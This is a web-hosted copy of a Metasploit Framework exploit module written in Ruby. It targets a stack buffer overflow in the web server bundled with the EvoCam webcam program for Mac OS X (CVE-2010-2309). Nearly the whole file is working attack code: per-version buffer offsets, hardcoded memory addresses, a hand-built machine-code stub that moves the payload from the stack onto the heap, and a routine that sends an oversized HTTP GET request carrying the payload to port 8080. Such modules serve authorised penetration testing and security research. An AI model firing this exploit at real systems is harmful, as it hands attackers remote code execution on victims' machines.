Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/osx/http/evocam_webserver.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = AverageRanking
8
9
include Msf::Exploit::Remote::Tcp
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'MacOS X EvoCam HTTP GET Buffer Overflow',
16
'Description' => %q{
17
This module exploits a stack buffer overflow in the web server provided with the EvoCam
18
program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload
19
from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6,
20
3.6.7, and possibly earlier versions as well. EvoCam version 3.6.8 fixes the vulnerability.
21
},
22
'Author' => [
23
'Paul Harrington', # Original Exploit Author and MSF Module
24
'dookie', # MSF Module Assistance
25
],
26
'Platform' => 'osx',
27
'License' => MSF_LICENSE,
28
'References' => [
29
['CVE', '2010-2309'],
30
['OSVDB', '65043'],
31
['EDB', '12835'],
32
],
33
'Payload' => {
34
'Space' => 300,
35
'BadChars' => "\x00\xff\x09\x0a\x0b\x0c\x0c\x0d\x20",
36
'StackAdjustment' => -3500,
37
},
38
'Privileged' => false,
39
'Targets' => [
40
[
41
'Mac OS X 10.5.8 x86, EvoCam 3.6.6',
42
{
43
'Arch' => ARCH_X86,
44
'Offset' => 1560,
45
'Writable' => 0x8fe66448,
46
'setjmp' => 0x8fe1cf38,
47
'strdup' => 0x8fe210dc,
48
'jmp_eax' => 0x8fe01041
49
}
50
],
51
[
52
'Mac OS X 10.5.8 x86, EvoCam 3.6.7',
53
{
54
'Arch' => ARCH_X86,
55
'Offset' => 1308,
56
'Writable' => 0x8fe66448,
57
'setjmp' => 0x8fe1cf38,
58
'strdup' => 0x8fe210dc,
59
'jmp_eax' => 0x8fe01041
60
}
61
],
62
63
],
64
'DisclosureDate' => '2010-06-01',
65
'DefaultTarget' => 1,
66
'Notes' => {
67
'Reliability' => UNKNOWN_RELIABILITY,
68
'Stability' => UNKNOWN_STABILITY,
69
'SideEffects' => UNKNOWN_SIDE_EFFECTS
70
}
71
)
72
)
73
74
register_options(
75
[
76
Opt::RPORT(8080),
77
]
78
)
79
end
80
81
def make_exec_payload_from_heap_stub()
82
frag0 =
83
"\x90" + # nop
84
"\x58" + # pop eax
85
"\x61" + # popa
86
"\xc3" # ret
87
88
frag1 =
89
"\x90" + # nop
90
"\x58" + # pop eax
91
"\x89\xe0" + # mov eax, esp
92
"\x83\xc0\x0e" + # add eax, byte +0xc
93
"\x89\x44\x24\x08" + # mov [esp+0x8], eax
94
"\xc3" # ret
95
96
setjmp = target['setjmp']
97
writable = target['Writable']
98
strdup = target['strdup']
99
jmp_eax = target['jmp_eax']
100
101
exec_payload_from_heap_stub =
102
frag0 +
103
[setjmp].pack('V') +
104
[writable + 32, writable].pack("V2") +
105
frag1 +
106
"X" * 20 +
107
[setjmp].pack('V') +
108
[writable + 24, writable, strdup, jmp_eax].pack("V4") +
109
"X" * 4
110
end
111
112
def exploit
113
connect
114
115
offset = target['Offset']
116
117
buffer = "GET "
118
buffer << rand_text_alpha_upper(offset)
119
buffer << make_exec_payload_from_heap_stub()
120
buffer << "\x90\x90"
121
buffer << payload.encoded
122
buffer << " HTTP/1.0\r\n\r\n"
123
124
sock.put(buffer)
125
sock.close
126
127
handler()
128
disconnect
129
end
130
end
131
132